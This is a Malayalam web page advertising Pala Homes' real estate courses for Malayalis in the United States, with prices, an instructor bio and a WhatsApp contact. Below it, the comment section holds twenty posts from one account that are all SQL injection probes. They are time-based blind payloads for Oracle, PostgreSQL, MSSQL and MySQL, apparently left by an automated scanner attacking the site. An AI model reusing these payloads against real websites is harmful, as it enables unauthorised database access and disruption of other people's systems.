അമേരിക്കയിൽ റിയൽ എസ്റ്റേറ്റ് മലയാളത്തിൽ പഠിക്കാം:

അമേരിക്കയിൽ  റിയൽ എസ്റ്റേറ്റ് മലയാളത്തിൽ പഠിക്കാം: നമ്മുടെ സ്വപ്നങ്ങൾ യാഥാർഥ്യമാക്കാം!

 ഒരു സ്ഥിര വരുമാനമുള്ള ജോലി ഉണ്ടെങ്കിൽ, അതിനോടൊപ്പം എളുപ്പത്തിൽ ചെയ്യാവുന്ന ഒരു അധിക വരുമാന മാർഗമാണ് റിയൽ എസ്റ്റേറ്റ്.

“റിയൽ എസ്റ്റേറ്റ്” എന്ന് കേൾക്കുമ്പോൾ പലരും ആദ്യം ഓർക്കുന്നത് ഒരു റിയൽ എസ്റ്റേറ്റ് ഏജന്റിനെ ആണ്. പക്ഷേ, അത് തെറ്റിദ്ധാരണയാണ്! ഇത് “കല്യാണം” എന്ന് പറയുമ്പോൾ “കല്യാണ ബ്രോക്കർ” എന്ന് ഓർക്കുന്നതിന് സമാനമാണ്. കല്യാണം എന്നത് ജീവിതകാലം മുഴുവൻ നമ്മെ സ്വാധീനിക്കുന്ന ഒരു തീരുമാനമാണ്. അതുപോലെ തന്നെയാണ് റിയൽ എസ്റ്റേറ്റും—ഒരു ബ്രോക്കറുടെ വാക്കുകൾ മാത്രം കേട്ട് തീരുമാനമെടുക്കുന്നതിന് പകരം, നമ്മുടെ അറിവും പഠനവും ഉപയോഗിച്ച് ശരിയായ തീരുമാനങ്ങൾ എടുക്കണം. അങ്ങനെ ചെയ്താൽ, നമ്മുടെ തീരുമാനങ്ങൾ ദീർഘകാലത്തേക്ക് നിലനിൽക്കും.

റിയൽ എസ്റ്റേറ്റ്: അറിവാണ് നമ്മുടെ ശക്തി

നമ്മുടെ വീടോ മറ്റ് നിക്ഷേപങ്ങളോ തിരഞ്ഞെടുക്കുമ്പോൾ മതിയായ അറിവുണ്ടെങ്കിൽ, ഏറ്റവും മികച്ച തീരുമാനങ്ങൾ എടുക്കാൻ നമുക്ക് കഴിയും. ഈ അറിവ് നമ്മുടെ തലമുറകൾക്കും കുട്ടികൾക്കും പകർന്നു നൽകാനും സാധിക്കും. പാലാ ഹോംസിന്റെ റിയൽ എസ്റ്റേറ്റ് കോഴ്സ് പഠിക്കുന്നതിലൂടെ നമുക്ക് പഠിക്കാം:

  • നമ്മുടെ നിലവിലുള്ള വരുമാനം ഘട്ടം ഘട്ടമായി എങ്ങനെ വർധിപ്പിക്കാം.
  • പെൻഷൻ ലഭിച്ചാലും, ജോലി നഷ്ടപ്പെട്ടാലും, ആരോഗ്യം ക്ഷയിച്ചാലും ജീവിതനിലവാരം താഴാതെ ജീവിക്കാനുള്ള വഴികൾ.
  • ലൈസൻസ് എടുത്ത് റിയൽ എസ്റ്റേറ്റ് ബിസിനസിൽ തുടങ്ങാനുള്ള അവസരങ്ങൾ (ഇത് ഒരു ചെറിയ ഭാഗം മാത്രമാണ്!).

 

പാലാ ഹോംസ്: അറിവും പരിചയവും ഒരുമിച്ച്

പാലാ ഹോംസിൽ നമുക്ക് ലഭിക്കുന്നത് ഒരു ലൈസൻസ് മാത്രമല്ല—റിയൽ എസ്റ്റേറ്റിന്റെ എല്ലാ മേഖലകളിലും പ്രായോഗിക പരിചയം നേടാനുള്ള അവസരമാണ്.

  • വീട്ടിലിരുന്ന് പരിചയം നേടാം: ഏജന്റാകും മുമ്പേ, വിവിധ റിയൽ എസ്റ്റേറ്റ് വ്യാപാരങ്ങളെക്കുറിച്ച് ആഴത്തിൽ മനസ്സിലാക്കാം.
  • നമ്മുടെ സാഹചര്യങ്ങൾ മനസ്സിലാക്കി നിക്ഷേപിക്കാം: ശരിയായ സമയത്ത് നിക്ഷേപം നടത്താനും, വിറ്റ് ലാഭം നേടാനും നമുക്ക് കഴിയും.
  • സ്വന്തമായി തീരുമാനങ്ങൾ എടുക്കാം: മുഴുവൻ സമയ ജോലി ചെയ്യുന്നവർ—നഴ്സുമാർ, ഓഫീസ് ജീവനക്കാർ—സ്വന്തം നിക്ഷേപങ്ങൾ തിരഞ്ഞെടുത്ത് വിജയകരമായി പണമുണ്ടാക്കുന്നു. താങ്കൾക്കും  അത് സാധിക്കും!

അവസരങ്ങളുടെ കടലിൽ മീൻപിടിക്കാൻ പഠിക്കൂ

റിയൽ എസ്റ്റേറ്റ് എന്ന വിശാലമായ കടലിൽ വലയെറിയാൻ പാലാ ഹോംസ് നിങ്ങളെ സഹായിക്കും.

  • വലയും വള്ളവും ഫ്രീ: ഞങ്ങൾ നിങ്ങളെ  ആവശ്യമായ എല്ലാ അറിവും ഉപകരണങ്ങളും നൽകും.
  • വലയെറിയാൻ പഠിപ്പിക്കും: ശരിയായ രീതിയിൽ നിക്ഷേപം നടത്താനും ലാഭം നേടാനും റിയൽ എസ്റ്റേറ്റ് മലയാളത്തിൽ പഠിക്കാം: നമ്മുടെ സ്വപ്നങ്ങൾ യാഥാർഥ്യമാക്കാം!

പാലാ ഹോംസ്—നമ്മുടെ റിയൽ എസ്റ്റേറ്റ് സ്വപ്നങ്ങൾ യാഥാർഥ്യമാക്കാൻ, ശരിയായ തീരുമാനങ്ങൾ എടുക്കാൻ നമ്മെ പഠിപ്പിക്കുന്നു.

വരൂ, ഇന്ന് തന്നെ തുടങ്ങൂ!

ഫ്രീയായി വാട്ട് സ് ആപ്പിലൂടെ  പഠിക്കൂ.. സ്വന്തം ജോലി ചെയ്തു കൊണ്ട് അധിക വരുമാനം നേടൂ.... 

ഫ്രീ റിയൽ എസ്റ്റേറ്റ് ക്ലാസുകൾ മലയാളത്തിൽ

മലയാളത്തിലും ഇംഗ്ലീഷിലുമുള്ള റിയൽ എസ്റ്റേറ്റ്  കോഴ്സ് പഠിക്കാനും റിയൽ എസ്റ്റേറ്റ് ഇൻവെസ്റ്റ്മെന്റ്ലൂടെ  ബിസിനസ് ചെയ്തു പണമുണ്ടാക്കാനും ശരിയായ പ്രോപ്പർട്ടി തെരഞ്ഞെടുക്കാനും പഠിപ്പിക്കുന്ന ഓൺലൈൻ കോഴ്സ് MLS പ്രായോഗിക പരിജ്ഞാനം ഉൾപ്പെടെ $99.

 

ഇത് പഠിച്ചു കഴിഞ്ഞു. ഇനി ലൈസൻസ് നേടാം എന്ന് തോന്നുകയാണെങ്കിൽ 65 മണിക്കൂർ  നീണ്ട കോഴ്സിന്  $200. ഇതിനും മലയാള പരിഭാഷ വേണമെങ്കിൽ $99. 

 നിങ്ങളുടെ ഇൻസ്ട്രക്ടറെ പരിചയപ്പെടൂ.

ലൈസൻസുള്ള  ജനറൽ  കോൺട്രാക്ടർ, ഹോം ഇൻസ്‌പെക്ടർ, പ്ലംബിംഗ് കോൺട്രാക്ടർ, നിര്മ്മാണ പ്രവർത്തനങ്ങൾ പരിശോധിക്കുന്ന ബിൽഡിംഗ് ഇൻസ്‌പെക്ടർ,  ഫ്ലോറിഡയിലെ  പ്രധാന ഇൻവെസ്റ്റ്മെന്റ് ബ്രോക്കറേജ് ആയ പാലാ ഹോംസ് ന്റെ ബ്രോക്കർ,  അംഗീകൃത റീയൽ എസ്റ്റേറ്റ് എഡ്യൂക്കേറ്റർ എന്നീ നിലകളിൽ ദീർഘ കാല പ്രവർത്തന പരിചയമുള്ള സെബാസ്റ്റ്യൻ വയലിങ്കൽ മലയാളം പഠന ത്തിനായുള്ള Learn Malayalam through  English, Learn Malayalam Through Daily Prayers  തുടങ്ങിയ പുസ്തകങ്ങളുടെ രചയിതാവും ആണ്.

For More details and Registration.
Please WhatsApp/Text Pala Homes Office. +1 954 673 7728,   

Author :

LOGIN TO REPOST THIS NEWS

LEAVE A COMMENT

Cease from posting remarks that are foul, abusive or provocative, and don't enjoy individual assaults, verbally abusing or affecting scorn against any community.Help us erase remarks don't pursue these rules by checking them hostile. We should cooperate to keep the discussion common.


COMMENTS
  1. author
    September 08, 2026
    xsjyBldb

    ����%2527%2522\'\"

  2. author
    September 08, 2026
    xsjyBldb

    '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  3. author
    September 08, 2026
    xsjyBldb

    *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  4. author
    September 08, 2026
    xsjyBldb

    zsLc3R1b')) OR 914=(SELECT 914 FROM PG_SLEEP(15))--

  5. author
    September 08, 2026
    xsjyBldb

    Uwpyj3rt') OR 355=(SELECT 355 FROM PG_SLEEP(15))--

  6. author
    September 08, 2026
    xsjyBldb

    61lHhkMQ' OR 564=(SELECT 564 FROM PG_SLEEP(15))--

  7. author
    September 08, 2026
    xsjyBldb

    -1)) OR 752=(SELECT 752 FROM PG_SLEEP(15))--

  8. author
    September 08, 2026
    xsjyBldb

    -1) OR 810=(SELECT 810 FROM PG_SLEEP(15))--

  9. author
    September 08, 2026
    xsjyBldb

    -1 OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  10. author
    September 08, 2026
    xsjyBldb

    jVIR3iGr')); waitfor delay '0:0:15' --

  11. author
    September 08, 2026
    xsjyBldb

    v9ER9Dva'); waitfor delay '0:0:15' --

  12. author
    September 08, 2026
    xsjyBldb

    lqoU5ecW'; waitfor delay '0:0:15' --

  13. author
    September 08, 2026
    xsjyBldb

    -1 waitfor delay '0:0:15' --

  14. author
    September 08, 2026
    xsjyBldb

    -1)); waitfor delay '0:0:15' --

  15. author
    September 08, 2026
    xsjyBldb

    -1); waitfor delay '0:0:15' --

  16. author
    September 08, 2026
    xsjyBldb

    -1; waitfor delay '0:0:15' --

  17. author
    September 08, 2026
    xsjyBldb

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  18. author
    September 08, 2026
    xsjyBldb

    0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z

  19. author
    September 08, 2026
    xsjyBldb

    0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z

  20. author
    September 08, 2026
    xsjyBldb

    *if(now()=sysdate(),sleep(15),0)